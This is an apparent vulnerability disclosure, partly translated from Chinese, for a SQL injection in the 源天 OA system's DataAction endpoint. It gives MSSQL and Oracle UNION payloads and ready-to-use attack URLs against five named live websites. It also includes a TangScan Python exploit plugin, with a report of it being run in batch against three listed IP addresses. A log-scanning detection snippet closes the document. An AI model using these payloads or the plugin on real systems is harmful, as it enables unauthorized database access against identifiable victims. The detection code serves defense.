A generic SQL injection vulnerability in a certain OA system

1) Generic SQL injection vulnerability
Vendor: 源天軟件
Website: http://www.visionsoft.com.cn/
Vulnerable path: ServiceAction/com.velcro.base.DataAction
Notes: this OA system runs on either of two database types, MSSQL or Oracle, so the case gives an exploitation PoC for each. PoC:
MsSql數(shù)據(jù)庫:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
Oracle數(shù)據(jù)庫:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
(直接訪問即可):
MsSql部分
A)http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
B)http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
C)http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
Oracle targets
D)http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
E)http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
2) As promised, and in support of TangScan, here is the finished plugin code (I'm no coder; this was thrown together, so experts please go easy on me). By the time this is published the plugin will already be in the TangScan.com repository.
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)
See the file 'docs/COPYING' for copying permission

author: fate0
"""

import re

from thirdparty import requests
from modules.exploit import TSExploit

__all__ = ['TangScan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        # Plugin metadata as registered in TangScan.
        self.info = {
            "name": "源天軟件OA辦公系統 sql 注入MSSQL版漏洞(無需登錄)",
            "product": "源天",
            "product_version": "",
            "desc": """
                OA辦公系統 /ServiceAction/com.velcro.base.DataAction 中的 sql 參數存在注入, 將導致敏感數據泄漏
            """,
            "license": self.license.TS,
            "author": ["Coody"],
            "ref": [
                {self.ref.wooyun: "暫無"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "2015-07-22",
            "create_date": "2015-07-23",
        }

        # The only option: the target base URL.
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目標 url"
            }
        })

        # Result structure filled in by verify() and exploit().
        self.register_result({
            "status": False,
            "data": {
                "db_info": {
                    "version": "",
                    "current_db": ""
                }
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")

        # The element name that wrapped this capture group was lost when the post
        # was scraped; as shown, the pattern captures any non-empty text.
        re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:  # "except Exception as e" works on both Python 2 and 3
            self.result.error = str(e)
            return

        re_result = re_version_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.version = re_result[0]
        self.result.description = "目標 {url} 存在sql注入, 目標使用數據庫版本為: {db_version}".format(
            url=self.option.url,
            db_version=re_result[0]
        )

    def exploit(self):
        self.print_debug("exploit start")

        # Same caveat as in verify(): the enclosing markup of the pattern is not preserved on the page.
        re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.current_db = re_result[0]
        self.result.description = "目標 {url} 存在sql注入, 數據庫名稱為: {current_db}".format(
            url=self.option.url,
            current_db=self.result.data.db_info.current_db
        )


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())

Let's look at the results after running the plugin:
執(zhí)行 --mode verify (默認)
執(zhí)行 --mode exploit
The plugin runs normally and outputs the data without issues. That should have been the end of this post...
but I couldn't help myself,
so here are the test results of the batch site-checking script as well.
測試的網(wǎng)站分別是:
http://60.12.113.234:8080/
http://121.14.195.31:8081/
http://218.246.22.194:8080/
In the test, --mode exploit was run directly to fetch the database names in batch.
After the test, here is the content of the results file success.txt.
Okay, that really is the end...
Solution:
Input filtering.
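Any filtering of the sql parameter has to undo the "|20" space encoding the PoC relies on, or a rule that looks for "union select" will miss "|20union|20select". The following detection logic is an added example (not from the post or from TangScan): it scans access-log lines for requests to the DataAction endpoint, normalizes percent-encoding and "|20" before inspecting the sql parameter, and flags UNION-based probes; the log format and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The endpoint and the "|20" space encoding come from the PoC on this page;
# the log format and the sample lines are constructed for this example.
ENDPOINT = "/ServiceAction/com.velcro.base.DataAction"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.+?\bselect\b", re.IGNORECASE | re.DOTALL)

def normalize_sql(value):
    """Undo up to two layers of percent-encoding, then the app's '|20' space encoding."""
    for _ in range(2):
        value = unquote(value)
    return re.sub(r"\s+", " ", value.replace("|20", " ")).strip()

def inspect_request(path_and_query):
    """Return the normalized sql parameter if the request is a UNION probe, else None."""
    parts = urlsplit(path_and_query)
    if parts.path != ENDPOINT:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes one %-layer itself
    for raw in params.get("sql", []):
        sql = normalize_sql(raw)
        if UNION_RE.search(sql):
            return sql
    return None

def scan_log(lines):
    """Return (client_ip, normalized_sql) for every suspicious access-log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            sql = inspect_request(match.group(1))
            if sql is not None:
                hits.append((line.split(" ", 1)[0], sql))
    return hits

# Constructed sample log: a page view, a legitimate-looking query, the page's
# MSSQL PoC, and the same kind of probe with the sql parameter double-encoded.
SAMPLE_LOG = [
    '10.0.0.7 - - [22/Jul/2015:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 1532',
    '10.0.0.7 - - [22/Jul/2015:10:01:05 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%2742%27&isworkflow=true HTTP/1.1" 200 88',
    '10.0.0.9 - - [22/Jul/2015:10:02:11 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true HTTP/1.1" 200 214',
    '10.0.0.9 - - [22/Jul/2015:10:02:14 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=%257C20select%257C20x%257C20from%257C20t%2520union%2520all%2520select%2520db_name()&isworkflow=true HTTP/1.1" 200 180',
]
```

Running scan_log(SAMPLE_LOG) reports only the two 10.0.0.9 requests; the plain query with id='42' is left alone, since it is the endpoint's normal (if unsafe) usage.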